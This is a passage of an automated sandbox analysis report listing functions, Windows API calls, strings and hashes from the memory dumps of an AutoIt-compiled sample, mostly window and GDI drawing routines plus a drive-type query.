                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 7dda417c8584a9913f1dccb52e9afb6ba96fd50143fcc58ebefa1412ae654202
                                                                                                                    • Instruction ID: ebf96d15424fc3256be0862e03295843804f7cea01bd8300e093a30cf124ad1b
                                                                                                                    • Opcode Fuzzy Hash: 7dda417c8584a9913f1dccb52e9afb6ba96fd50143fcc58ebefa1412ae654202
                                                                                                                    • Instruction Fuzzy Hash: E0315ADB85D6D25FD7235B302CB9593BFB08A2728534E0DCBC8D68A553F1088A0BDB42
                                                                                                                    Function 00338808 Relevance: .6, Instructions: 590COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6047d07cdd2353bc0fb86ae1200e594beb333721f1e86644c9efb7afae82f50f
                                                                                                                    • Instruction ID: d7ba13a97121252c2748dc3283422a7162179a00eb20c299cea5cd6fe529b1b6
                                                                                                                    • Opcode Fuzzy Hash: 6047d07cdd2353bc0fb86ae1200e594beb333721f1e86644c9efb7afae82f50f
                                                                                                                    • Instruction Fuzzy Hash: 022224305047468BDF3F8B24C4D477C77A1BB01305F2A846BF54A8B992DBB8DD92C641
                                                                                                                    Function 003421C5 Relevance: .3, Instructions: 345COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                    • Instruction ID: 05ea956715044e9da1ae40e4d7f68cba760a39ff5cf1194dfd267a0d043aa8be
                                                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                    • Instruction Fuzzy Hash: 82C183722054930ADB6F463A843413FFAE15EA37B135B076DE8B2DF1D4EE20E965D620
                                                                                                                    Function 003425FA Relevance: .3, Instructions: 341COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction ID: a28086505bda745522e15a9e8359061313c416582c1d7968faa69ab713711665
                                                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                    • Instruction Fuzzy Hash: D8C192722055930ADF2F463A843403FBAE15EA37B135B076DE4B2EF1D5EE60E964D620
                                                                                                                    Function 00341978 Relevance: .3, Instructions: 323COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction ID: 9e7b19b2d4aff1084b68be2bf09f6a263d1b7d1426a9acbfdf5da2c7ecea1535
                                                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                    • Instruction Fuzzy Hash: A0C19F7224599309DF2E463AC47413EBAE19EA37B131B076DD4B2CF1D4EE20E9A59620
                                                                                                                    Function 0123ABD0 Relevance: .1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                    • Instruction ID: 0caee591daf76e172f470ae293a895609334796e0fb6ba94a1dec36599c1f4e0
                                                                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                                                                    • Instruction Fuzzy Hash: 6241D3B1D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB40
                                                                                                                    Function 0123AA60 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                    • Instruction ID: 6a94c23947d2e1540bee465768d90a8341fa8c0f242e02206c27084498cfc258
                                                                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                                                    • Instruction Fuzzy Hash: EB018079A11109EFCB44DF98C6909AEF7B5FB88210B2085A9D949A7301D730AE42DB80
                                                                                                                    Function 0123AAC0 Relevance: .0, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                    • Instruction ID: 020aa1fef5caf2c74da6e65947ae0f2ea190e6227d200d6db8d4679c991b9de1
                                                                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                                                                    • Instruction Fuzzy Hash: 55019678A10109EFCB44DF98C5909AEF7B6FF88310F2085A9D949E7301E730AE41DB80
                                                                                                                    Function 01239430 Relevance: .0, Instructions: 6COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2165997295.0000000001237000.00000040.00000020.00020000.00000000.sdmp, Offset: 01237000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_1237000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                                                    Function 00397806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0039785B
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0039786D
                                                                                                                    • DestroyWindow.USER32 ref: 0039787B
                                                                                                                    • GetDesktopWindow.USER32 ref: 00397895
                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0039789C
                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003979DD
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003979ED
                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397A35
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00397A41
                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00397A7B
                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397A9D
                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397AB0
                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397ABB
                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00397AC4
                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397AD3
                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00397ADC
                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397AE3
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00397AEE
                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397B00
                                                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,003B2CAC,00000000), ref: 00397B16
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00397B26
                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00397B4C
                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00397B6B
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397B8D
                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00397D7A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                    • Opcode ID: 08b580860beca3b254454a997c79c3a671a8656b1efd016c265ec16bbba1ce37
                                                                                                                    • Instruction ID: 7a3b205aed079aa758e3c047a59db578e692b6d1acbbc1379a13009d0b1dde9b
                                                                                                                    • Opcode Fuzzy Hash: 08b580860beca3b254454a997c79c3a671a8656b1efd016c265ec16bbba1ce37
                                                                                                                    • Instruction Fuzzy Hash: EB027971910119EFDF16DFA8DC89EAE7BB9EF49314F048159F905AB2A1CB70AD01CB60
                                                                                                                    Function 003A356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharUpperBuffW.USER32(?,?,003AF910), ref: 003A3627
                                                                                                                    • IsWindowVisible.USER32(?), ref: 003A364B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                    • Opcode ID: de433945bcd89d49cbcc15aea8b1244f447f5479ad0492631ddbdec881078e8d
                                                                                                                    • Instruction ID: adf9aa7fa4a012480996a365dd4ac5b00435131a1bdccf56075b637b66157fad
                                                                                                                    • Opcode Fuzzy Hash: de433945bcd89d49cbcc15aea8b1244f447f5479ad0492631ddbdec881078e8d
                                                                                                                    • Instruction Fuzzy Hash: DCD1AD352043119BCB16EF10D456B6E77E5EF96350F15846AF88A5F3A2CB31EE0ACB81
                                                                                                                    Function 003AA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 003AA630
                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 003AA661
                                                                                                                    • GetSysColor.USER32(0000000F), ref: 003AA66D
                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 003AA687
                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 003AA696
                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 003AA6C1
                                                                                                                    • GetSysColor.USER32(00000010), ref: 003AA6C9
                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 003AA6D0
                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 003AA6DF
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 003AA6E6
                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 003AA731
                                                                                                                    • FillRect.USER32(?,?,00000000), ref: 003AA763
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 003AA78E
                                                                                                                      • Part of subcall function 003AA8CA: GetSysColor.USER32(00000012), ref: 003AA903
                                                                                                                      • Part of subcall function 003AA8CA: SetTextColor.GDI32(?,?), ref: 003AA907
                                                                                                                      • Part of subcall function 003AA8CA: GetSysColorBrush.USER32(0000000F), ref: 003AA91D
                                                                                                                      • Part of subcall function 003AA8CA: GetSysColor.USER32(0000000F), ref: 003AA928
                                                                                                                      • Part of subcall function 003AA8CA: GetSysColor.USER32(00000011), ref: 003AA945
                                                                                                                      • Part of subcall function 003AA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003AA953
                                                                                                                      • Part of subcall function 003AA8CA: SelectObject.GDI32(?,00000000), ref: 003AA964
                                                                                                                      • Part of subcall function 003AA8CA: SetBkColor.GDI32(?,00000000), ref: 003AA96D
                                                                                                                      • Part of subcall function 003AA8CA: SelectObject.GDI32(?,?), ref: 003AA97A
                                                                                                                      • Part of subcall function 003AA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 003AA999
                                                                                                                      • Part of subcall function 003AA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003AA9B0
                                                                                                                      • Part of subcall function 003AA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 003AA9C5
                                                                                                                      • Part of subcall function 003AA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003AA9ED
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3521893082-0
                                                                                                                    • Opcode ID: 303550e29727bbd60a0be79c4a409f29f00a35cd37af721c449ff80cf7e36087
                                                                                                                    • Instruction ID: 226833c737d51d5437baa671e57d0d9f2f6845cf1a8cbb9b1e97bdf50c753d5d
                                                                                                                    • Opcode Fuzzy Hash: 303550e29727bbd60a0be79c4a409f29f00a35cd37af721c449ff80cf7e36087
                                                                                                                    • Instruction Fuzzy Hash: 04916C72408701FFC7129FA4DC08A5BBBADFF8A321F144B29F9A2961A0D771D945CB52
                                                                                                                    Function 003974AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • DestroyWindow.USER32(00000000), ref: 003974DE
                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0039759D
                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 003975DB
                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 003975ED
                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00397633
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 0039763F
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00397683
                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00397692
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003976A2
                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 003976A6
                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 003976B6
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003976BF
                                                                                                                    • DeleteDC.GDI32(00000000), ref: 003976C8
                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 003976F4
                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 0039770B
                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00397746
                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0039775A
                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 0039776B
                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0039779B
                                                                                                                    • GetStockObject.GDI32(00000011), ref: 003977A6
                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 003977B1
                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 003977BB
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                    • Opcode ID: fbef2ae39b591f23eb82320efdce101ce1a8f0c7b44da4c19cc79400868e33a6
                                                                                                                    • Instruction ID: a23e0a1f4d78025b00ce424efeedfebbf421b1c2158c9b0b62696c084aab9310
                                                                                                                    • Opcode Fuzzy Hash: fbef2ae39b591f23eb82320efdce101ce1a8f0c7b44da4c19cc79400868e33a6
                                                                                                                    • Instruction Fuzzy Hash: 73A18171A50615BFEB25DBA4DC4AFAE7BBDEB09714F004215FA15AB2E0C770AD00CB64
                                                                                                                    Function 0038AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0038AD1E
                                                                                                                    • GetDriveTypeW.KERNEL32(?,003AFAC0,?,\\.\,003AF910), ref: 0038ADFB
                                                                                                                    • SetErrorMode.KERNEL32(00000000,003AFAC0,?,\\.\,003AF910), ref: 0038AF59
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2164672628.0000000000321000.00000020.00000001.01000000.00000003.sdmp, Offset: 00320000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2164595977.0000000000320000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164885381.00000000003D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2164979334.00000000003DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2165079052.00000000003E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_320000_19d6P55zd1.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                    • Opcode ID: 87c267aa8d3944d5e371474d4b75dd1b8916597e90c2fed9ef4a3a41a6945805
                                                                                                                    • Instruction ID: 6269cfc664f9f93c284244b49eb12b0f08ae2c8511a383247189970ed4585997
                                                                                                                    • Opcode Fuzzy Hash: 87c267aa8d3944d5e371474d4b75dd1b8916597e90c2fed9ef4a3a41a6945805
                                                                                                                    • Instruction Fuzzy Hash: 3251C0B1648B05AB9B13FB24DD92CFD73A4EB49700B2044D7F507AB790DAB0AE01DB42
                                                                                                                    Function 003268DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
